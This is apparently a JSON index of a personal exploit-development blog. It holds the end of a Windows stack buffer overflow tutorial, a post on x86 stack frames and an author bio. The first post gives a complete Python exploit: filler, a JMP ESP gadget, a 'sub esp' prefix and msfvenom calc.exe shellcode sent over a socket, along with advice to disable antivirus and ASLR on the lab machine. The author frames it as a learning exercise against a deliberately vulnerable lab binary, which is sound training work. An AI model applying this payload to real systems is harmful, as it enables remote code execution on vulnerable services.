of the encoded bytes it has not decoded yet. The shellcode corrupts itself before it finishes unpacking and crashes.\nThe fix is to create distance between ESP and the start of the shellcode before the decoder begins running.\nOption 1: NOP sled. Prepend 0x90 bytes before the shellcode. Each NOP is a single byte instruction that does nothing except advance EIP by one. ESP does not move. After sliding through 16 NOPs, EIP is pointing at the shellcode but ESP is still 16 bytes behind, sitting in the sled. When the decoder runs and writes scratch values relative to ESP, those writes land in the NOP sled area, which has already been executed and does not matter.\npayload = b\u0026#34;A\u0026#34; * 68 + jmp_esp + b\u0026#34;\\x90\u0026#34; * 16 + buf Option 2: sub esp prefix. Prepend sub esp, 0x10 before the shellcode. This is the opcode \\x83\\xec\\x10. It is a single 3-byte instruction that subtracts 16 from ESP, moving it 16 bytes below the shellcode. The decoder then has clean scratch space that does not overlap with the encoded payload at all.\npayload = b\u0026#34;A\u0026#34; * 68 + jmp_esp + b\u0026#34;\\x83\\xec\\x10\u0026#34; + buf Both approaches solve the same problem. The sub esp version costs 3 bytes instead of 16, which is worth knowing when buffer space is tight.\nThe Full Exploit import socket import struct import sys TARGET_IP = \u0026#34;192.168.122.85\u0026#34; TARGET_PORT = 4444 def exploit(): print(f\u0026#34;[*] Target : {TARGET_IP}:{TARGET_PORT}\u0026#34;) print(f\u0026#34;[*] Gadget : JMP ESP @ 0x75d099fd (msvcrt.dll)\u0026#34;) print(f\u0026#34;[*] Bad chars : \\\\x00\u0026#34;) print(f\u0026#34;[*] Encoder : x86/shikata_ga_nai\u0026#34;) jmp_esp = struct.pack(\u0026#34;\u0026lt;I\u0026#34;, 0x75d099fd) # msfvenom -p windows/exec CMD=calc.exe -b \u0026#34;\\x00\u0026#34; -f python buf = b\u0026#34;\u0026#34; buf += b\u0026#34;\\xda\\xcf\\xbf\\xb9\\x47\\xc3\\xec\\xd9\\x74\\x24\\xf4\\x58\u0026#34; buf += b\u0026#34;\\x33\\xc9\\xb1\\x31\\x31\\x78\\x18\\x03\\x78\\x18\\x83\\xe8\u0026#34; buf += b\u0026#34;\\x45\\xa5\\x36\\x10\\x5d\\xa8\\xb9\\xe9\\x9d\\xcd\\x30\\x0c\u0026#34; buf += b\u0026#34;\\xac\\xcd\\x27\\x44\\x9e\\xfd\\x2c\\x08\\x12\\x75\\x60\\xb9\u0026#34; buf += b\u0026#34;\\xa1\\xfb\\xad\\xce\\x02\\xb1\\x8b\\xe1\\x93\\xea\\xe8\\x60\u0026#34; buf += b\u0026#34;\\x17\\xf1\\x3c\\x43\\x26\\x3a\\x31\\x82\\x6f\\x27\\xb8\\xd6\u0026#34; buf += b\u0026#34;\\x38\\x23\\x6f\\xc7\\x4d\\x79\\xac\\x6c\\x1d\\x6f\\xb4\\x91\u0026#34; buf += b\u0026#34;\\xd5\\x8e\\x95\\x07\\x6e\\xc9\\x35\\xa9\\xa3\\x61\\x7c\\xb1\u0026#34; buf += b\u0026#34;\\xa0\\x4c\\x36\\x4a\\x12\\x3a\\xc9\\x9a\\x6b\\xc3\\x66\\xe3\u0026#34; buf += b\u0026#34;\\x44\\x36\\x76\\x23\\x62\\xa9\\x0d\\x5d\\x91\\x54\\x16\\x9a\u0026#34; buf += b\u0026#34;\\xe8\\x82\\x93\\x39\\x4a\\x40\\x03\\xe6\\x6b\\x85\\xd2\\x6d\u0026#34; buf += b\u0026#34;\\x67\\x62\\x90\\x2a\\x6b\\x75\\x75\\x41\\x97\\xfe\\x78\\x86\u0026#34; buf += b\u0026#34;\\x1e\\x44\\x5f\\x02\\x7b\\x1e\\xfe\\x13\\x21\\xf1\\xff\\x44\u0026#34; buf += b\u0026#34;\\x8a\\xae\\xa5\\x0f\\x26\\xba\\xd7\\x4d\\x2c\\x3d\\x65\\xe8\u0026#34; buf += b\u0026#34;\\x02\\x3d\\x75\\xf3\\x32\\x56\\x44\\x78\\xdd\\x21\\x59\\xab\u0026#34; buf += b\u0026#34;\\x9a\\xe3\\xc2\\xcb\\xb4\\x93\\xac\\x61\\xf9\\xf9\\x4e\\x5c\u0026#34; buf += b\u0026#34;\\x3d\\x04\\xcd\\x55\\xbd\\xf3\\xcd\\x1f\\xb8\\xb8\\x49\\xf3\u0026#34; buf += b\u0026#34;\\xb0\\xd1\\x3f\\xf3\\x67\\xd1\\x15\\x90\\xe6\\x41\\xf5\\x79\u0026#34; buf += b\u0026#34;\\x8d\\xe1\\x9c\\x85\u0026#34; sub_esp = b\u0026#34;\\x83\\xec\\x10\u0026#34; # sub esp, 0x10 payload = b\u0026#34;A\u0026#34; * 68 # fill buf[64] + overwrite saved EBP payload += jmp_esp # overwrite return address with JMP ESP gadget payload += sub_esp # move ESP away before decoder runs payload += buf # shikata_ga_nai encoded shellcode print(f\u0026#34;[*] Payload : {len(payload)} bytes\u0026#34;) print(f\u0026#34;[*] Layout : [A x68] [JMP ESP] [sub esp,10] [shellcode x{len(buf)}]\u0026#34;) try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((TARGET_IP, TARGET_PORT)) print(f\u0026#34;[+] Connected\u0026#34;) s.send(payload) print(f\u0026#34;[+] Payload sent\u0026#34;) s.close() print(f\u0026#34;[+] Done. Check target for calc.exe\u0026#34;) except ConnectionRefusedError: print(f\u0026#34;[-] Connection refused. Is the service running?\u0026#34;) sys.exit(1) except Exception as e: print(f\u0026#34;[-] Error: {e}\u0026#34;) sys.exit(1) if __name__ == \u0026#34;__main__\u0026#34;: exploit() Payload Layout Offset 0-67 : A x 68 fills buf[64], overwrites saved EBP Offset 68-71 : fd 99 d0 75 JMP ESP address in little-endian Offset 72-74 : 83 ec 10 sub esp, 0x10 (3 bytes) Offset 75+ : shellcode 220 bytes, shikata_ga_nai encoded Total : 295 bytes Execution Chain Here is exactly what happens from the moment the payload lands:\nThe service receives 295 bytes into input via recv(). vulnerable(input) gets called. The prologue sets up the stack frame. strcpy(buf, input) copies the payload into buf. It fills 64 bytes into the buffer, overwrites saved EBP with 0x41414141, and overwrites the return address with 0x75d099fd. printf runs and prints the garbled output. No crash yet because only stack data was corrupted, not any executing code. The epilogue runs. mov esp, ebp collapses the local frame. pop ebp loads 0x41414141 into EBP. ret pops 0x75d099fd into EIP. The CPU jumps to 0x75d099fd inside msvcrt.dll. The instruction at that address is JMP ESP. JMP ESP jumps to whatever ESP currently holds. ESP is pointing at offset 72, which is \\x83\\xec\\x10. sub esp, 0x10 executes. ESP moves 16 bytes downward, away from the shellcode. The shikata_ga_nai decoder stub runs. Its scratch writes relative to ESP land 16 bytes below the shellcode. No corruption. The decoder finishes unpacking and jumps into the decoded shellcode. The shellcode resolves Windows API addresses and calls WinExec(\u0026quot;calc.exe\u0026quot;, 0). calc.exe opens on the target. WinDbg Stack Dump at Execution Stack contents captured right as the shellcode was executing, showing the sub esp prefix at 011ff636 and the fully decoded shellcode in memory including calc.exe in ASCII at 011ff714:\n011ff634 00 00 00 00 00 00 ff ff-83 ec 10 d9 ec ba 67 d7 011ff644 2f 5e d9 74 24 f4 5f 29-c9 b1 31 31 57 18 83 c7 011ff654 04 03 57 14 e2 f5 fc e8-82 00 00 00 60 89 e5 31 011ff664 c0 64 8b 50 30 8b 52 0c-8b 52 14 8b 72 28 0f b7 011ff674 4a 26 31 ff ac 3c 61 7c-02 2c 20 c1 cf 0d 01 c7 011ff714 6c 63 2e 65 78 65 00 01-00 0c bb 21 02 c0 b7 5d Key Takeaways ret is just pop eip. Control what sits at ESP when ret executes and you control the CPU. That one primitive is what every stack overflow is built on.\nKnowing the stack layout cold matters more than any tool. Offset to EIP, what sits between the buffer and the return address, which direction the overflow travels. These need to be automatic before touching an exploit.\nEvery byte in the payload has a job. Filler, gadget address, decoder protection, shellcode. One wrong byte causes a crash with no obvious indication of where it went wrong. Build and verify each piece separately before assembling the full payload.\nBad character enumeration is not optional. A single corrupted byte mid-shellcode produces a failure that looks identical to any other crash. Do the enumeration before generating shellcode, every time.\nThe debugger tells the truth. dd esp, db esp, r eip, u eip. When something crashes, the answer is in the register dump and the stack contents. Not in the source code, not in intuition.\nThis exploit runs against a deliberately vulnerable lab binary compiled without modern mitigations. It is a learning exercise.\n","permalink":"https://4w4647.github.io/posts/stack-buffer-overflows-eip-control-to-code-execution/","summary":"\u003ch2 id=\"lab-setup\"\u003eLab Setup\u003c/h2\u003e\n\u003cp\u003eThree things need to be sorted on the Windows lab machine before any of this works cleanly.\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eAntivirus off.\u003c/strong\u003e Shellcode and exploit scripts will be flagged and quarantined before they ever run. Real-time protection, tamper protection, SmartScreen, all of it needs to go. Turn off tamper protection first, then real-time protection. If you do it the other way around, Defender re-enables itself.\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eASLR disabled system-wide.\u003c/strong\u003e Windows randomizes module base addresses by default, which means every time the program runs, the modules load at different addresses. For foundational exploit development you need those addresses to stay the same between runs so any gadget address you hardcode in a payload is still valid the next time. This registry key forces that:\u003c/p\u003e","title":"Stack Buffer Overflows - EIP Control to Code Execution"},{"content":"Where Everything Starts Before you write a single byte of shellcode, before you talk about ROP chains or DEP bypasses, there is one mental model you need to have locked in cold. The stack frame.\nEvery stack-based exploit ever written comes down to the same thing: you overflow a buffer, you overwrite a return address, and when the function returns, the CPU jumps somewhere you control. That\u0026rsquo;s it. The techniques that come later are just clever ways of working around defenses layered on top of that same primitive.\nSo let\u0026rsquo;s build the model from scratch, at the instruction level, with no hand-waving.\nThe x86 Stack The stack is a region of memory that grows downward. Higher addresses are at the top conceptually, but as you push things onto the stack, the stack pointer moves toward lower addresses.\nTwo registers manage it:\nESP (Stack Pointer) always points to the top of the stack, which is the lowest address currently in use EBP (Base Pointer) anchors the current function\u0026rsquo;s frame so locals and arguments can be accessed at fixed offsets Every push subtracts 4 from ESP and writes a value there. Every pop reads from ESP and adds 4. That is the whole mechanism. Before the Function: The Caller\u0026rsquo;s Job Take this C code:\nvoid foo(int a, int b) { char buf[16]; int x; } foo(1, 2); Before foo starts executing, the caller has to get the arguments onto the stack. In the cdecl calling convention (the default for most x86 C code), arguments are pushed right to left. Last argument first, first argument last.\npush 2 ; push b first (last argument) push 1 ; push a second (first argument) call foo ; now jump into foo Why right to left? Because after the push sequence, the first argument ends up closest to the top of the stack. Once the frame is set up, a will be at [ebp+8] and b will be at [ebp+12], consistently, regardless of how many arguments there are. This is why printf can take a variable number of arguments and still find the first one reliably.\nWhat does CALL actually do?\nCALL is not magic. It is equivalent to two instructions:\npush eip ; push the address of the instruction after CALL jmp foo ; jump to foo The address it pushes is called the return address. It is where execution will resume after foo finishes. Without it, the program would have no idea where to go back to.\nAt this point, just before foo starts, the stack looks like this:\nHigh Address ┌─────────────────┐ │ 2 │ argument b ├─────────────────┤ │ 1 │ argument a ├─────────────────┤ │ return address │ pushed by CALL, ESP points here └─────────────────┘ Low Address Inside the Function: The Prologue The moment execution lands inside foo, the first three instructions you will almost always see are the prologue:\npush ebp ; save the caller\u0026#39;s base pointer onto the stack mov ebp, esp ; point EBP at the current top of stack sub esp, 20 ; carve out 20 bytes for local variables Walk through each one:\npush ebp saves the caller\u0026rsquo;s EBP so it can be restored later. Every function does this so the chain of stack frames stays intact.\nmov ebp, esp sets EBP to the current value of ESP. From this point forward, EBP is fixed for the duration of the function. It does not move. This gives you a stable anchor to reference locals and arguments by offset.\nsub esp, 20 moves ESP down by 20 bytes, reserving space for buf[16] and int x (4 bytes). The compiler calculates the total size of all locals at compile time and emits a single sub esp to reserve all of it at once. You will never see one sub per variable.\nAfter the prologue, the stack looks like this:\nHigh Address ┌─────────────────┐ │ 2 │ [ebp+12] argument b ├─────────────────┤ │ 1 │ [ebp+8] argument a ├─────────────────┤ │ return address │ [ebp+4] ├─────────────────┤ │ saved EBP │ [ebp] EBP points here ├─────────────────┤ │ buf[16] │ [ebp-4] to [ebp-20] ├─────────────────┤ │ int x │ [ebp-24] ESP points here └─────────────────┘ Low Address Notice a few things:\nArguments live above EBP at positive offsets. Locals live below EBP at negative offsets. This is why you will constantly see things like [ebp+8] for the first argument and [ebp-4] for the first local in disassembly. That is not a coincidence. It is the direct result of the prologue.\nAlso notice that locals declared first end up at higher addresses (closer to saved EBP). Locals declared later end up at lower addresses. The stack grows downward, so as space gets reserved, it goes down. This ordering matters when you calculate overflow offsets.\nLeaving the Function: The Epilogue When foo is done, it needs to tear down the frame and return. This is the epilogue:\nmov esp, ebp ; point ESP back at saved EBP, discarding all locals pop ebp ; restore caller\u0026#39;s EBP, ESP now points at return address ret ; pop return address into EIP, jump there Walk through each one:\nmov esp, ebp collapses the local variable space in one shot. ESP jumps back up to where EBP is pointing, which is saved EBP. All the locals are now gone as far as the stack is concerned.\npop ebp reads the saved EBP value off the stack into the EBP register, restoring the caller\u0026rsquo;s frame. ESP moves up by 4, now pointing at the return address.\nret is the most important instruction in exploit development. It is equivalent to:\npop eip ; read whatever ESP points to, put it in EIP, add 4 to ESP The CPU takes the return address off the stack and jumps there. Execution resumes in the caller right after the original call foo.\nAfter ret, the stack is back to what it looked like before the call.\nA Note on Pointer Arguments One thing that catches beginners out. When a function takes a pointer argument like char *str, the caller does not push the string onto the stack. It pushes a 4-byte address pointing to where the string lives in memory.\nvoid bar(char *name, int age) { ... } bar(\u0026#34;alice\u0026#34;, 25); push 25 ; int age (4 bytes) push \u0026lt;addr of \u0026#34;alice\u0026#34;\u0026gt; ; char* name (4-byte pointer, not the string itself) call bar The string \u0026quot;alice\u0026quot; itself sits somewhere in the data segment. What goes on the stack is a pointer to it. Always 4 bytes on x86, regardless of how long the string is.\nLittle-Endian Memory One more thing you need burned in before you write any exploit code.\nx86 is little-endian. Multi-byte values are stored in memory with the least significant byte at the lowest address.\nSo the address 0x42658ade in memory looks like:\nAddress: 0x00 0x01 0x02 0x03 Value: de 8a 65 42 When you build a Python payload and need to put an address in your buffer, you have to account for this:\nimport struct struct.pack(\u0026#34;\u0026lt;I\u0026#34;, 0x42658ade) # produces: b\u0026#39;\\xde\\x8a\\x65\\x42\u0026#39; The \u0026lt;I means little-endian unsigned 32-bit integer. Get this backwards and your exploit crashes every time at ret because EIP gets loaded with the wrong address. This is one of the most common reasons a first exploit attempt fails.\nThe Exploit Primitive Here is where it all connects.\nbuf[16] lives near the bottom of the stack frame. If a function copies user-controlled data into buf without checking the length, that data writes upward in memory. It fills the buffer first, then keeps going.\nStarting from the first byte of buf:\nBytes 1-16 fill buf[16] Bytes 17-20 overwrite saved EBP Bytes 21-24 overwrite the return address Offset to EIP = 20 bytes\nWhen the function returns and ret executes, it pops whatever is at ESP into EIP. You put your own address at offset 21. The CPU jumps there. You own execution.\nThat is the primitive. That is what every stack overflow in this course is built on.\nCalculating the Offset: The Formula offset to EIP = size of buf + size of locals at HIGHER addresses than buf + 4 bytes for saved EBP The tricky part is the second term. Locals at higher addresses than buf sit between buf and saved EBP. You have to overflow through them to reach saved EBP and then the return address.\nLocals at lower addresses than buf are irrelevant. The overflow travels upward, away from them.\nExample:\nvoid vuln(char *input, int len) { char buf[64]; int check; } Stack after prologue:\nHigh Address ┌─────────────────┐ │ len │ argument ├─────────────────┤ │ input ptr │ argument (4-byte pointer) ├─────────────────┤ │ return address │ [ebp+4] ├─────────────────┤ │ saved EBP │ [ebp] ├─────────────────┤ │ buf[64] │ ├─────────────────┤ │ check │ ESP points here └─────────────────┘ Low Address check is below buf. Overflow never touches it. saved EBP is directly above buf.\nOffset to EIP = 64 + 4 = 68 bytes.\nWinDbg: Reading the Stack Live Once you are in a debugger staring at a crash, these are the commands you run immediately:\ndd ebp read saved EBP (tells you if the frame is corrupted) dd ebp+4 read the return address (tells you what EIP will become) dd esp read the top of the stack k show the full call stack r dump all registers If you see a pattern like 41414141 at [ebp+4], that means you\u0026rsquo;ve overwritten the return address with AAAA and you now know your overflow is reaching EIP. From there it is a matter of finding the exact offset and replacing those bytes with something useful.\nQuick Reference Instruction What It Does push ebp Save caller\u0026rsquo;s frame pointer onto the stack mov ebp, esp Anchor EBP to current stack top sub esp, N Reserve N bytes for local variables mov esp, ebp Collapse locals, ESP jumps back to saved EBP pop ebp Restore caller\u0026rsquo;s EBP, ESP moves to return address ret Pop return address into EIP, jump there Key Takeaways The stack grows downward. Push moves ESP toward lower addresses. Arguments are pushed right to left by the caller before CALL. CALL = push return address + jump to function. The prologue sets up the frame in three instructions. The epilogue tears it down in three instructions. EBP is fixed for the life of the function. Arguments are at positive offsets from EBP. Locals are at negative offsets. ret = pop EIP. If you control what is at ESP when ret executes, you control where the CPU goes next. Overflow travels upward in memory. Locals below the buffer are never reached. x86 is little-endian. Addresses in payloads must be packed bytes-reversed. Offset to EIP = size of buf + locals above buf + 4 (saved EBP). ","permalink":"https://4w4647.github.io/posts/stack-frames-the-foundation-of-every-stack-overflow/","summary":"\u003ch2 id=\"where-everything-starts\"\u003eWhere Everything Starts\u003c/h2\u003e\n\u003cp\u003eBefore you write a single byte of shellcode, before you talk about ROP chains or DEP bypasses, there is one mental model you need to have locked in cold. The stack frame.\u003c/p\u003e\n\u003cp\u003eEvery stack-based exploit ever written comes down to the same thing: you overflow a buffer, you overwrite a return address, and when the function returns, the CPU jumps somewhere you control. That\u0026rsquo;s it. The techniques that come later are just clever ways of working around defenses layered on top of that same primitive.\u003c/p\u003e","title":"Stack Frames - The Foundation of Every Stack Overflow"},{"content":"Security researcher into exploit development, reverse engineering, and vulnerability research. Background in C/C++, x86/x64 assembly, Windows internals, and malware analysis. Currently preparing for OSED.\nSkills C / C++ x86 / x64 Assembly Windows Internals Reverse Engineering Vulnerability Research Binary Exploitation Malware Analysis Offensive Security Research Python Security Tooling\nFind Me GitHub: github.com/4w4647 LinkedIn: linkedin.com/in/4w4647 X: x.com/4w4647 ","permalink":"https://4w4647.github.io/about/","summary":"\u003cp\u003eSecurity researcher into \u003cstrong\u003eexploit development\u003c/strong\u003e, \u003cstrong\u003ereverse engineering\u003c/strong\u003e, and \u003cstrong\u003evulnerability research\u003c/strong\u003e. Background in C/C++, x86/x64 assembly, Windows internals, and malware analysis. Currently preparing for OSED.\u003c/p\u003e\n\u003ch2 id=\"skills\"\u003eSkills\u003c/h2\u003e\n\u003cp\u003e\u003ccode\u003eC / C++\u003c/code\u003e \u003ccode\u003ex86 / x64 Assembly\u003c/code\u003e \u003ccode\u003eWindows Internals\u003c/code\u003e \u003ccode\u003eReverse Engineering\u003c/code\u003e\n\u003ccode\u003eVulnerability Research\u003c/code\u003e \u003ccode\u003eBinary Exploitation\u003c/code\u003e \u003ccode\u003eMalware Analysis\u003c/code\u003e\n\u003ccode\u003eOffensive Security Research\u003c/code\u003e \u003ccode\u003ePython Security Tooling\u003c/code\u003e\u003c/p\u003e\n\u003ch2 id=\"find-me\"\u003eFind Me\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eGitHub: \u003ca href=\"https://github.com/4w4647/\"\u003egithub.com/4w4647\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eLinkedIn: \u003ca href=\"https://linkedin.com/in/4w4647\"\u003elinkedin.com/in/4w4647\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eX: \u003ca href=\"https://x.com/4w4647\"\u003ex.com/4w4647\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e","title":"Awagat Dhungana (4w4647)"}]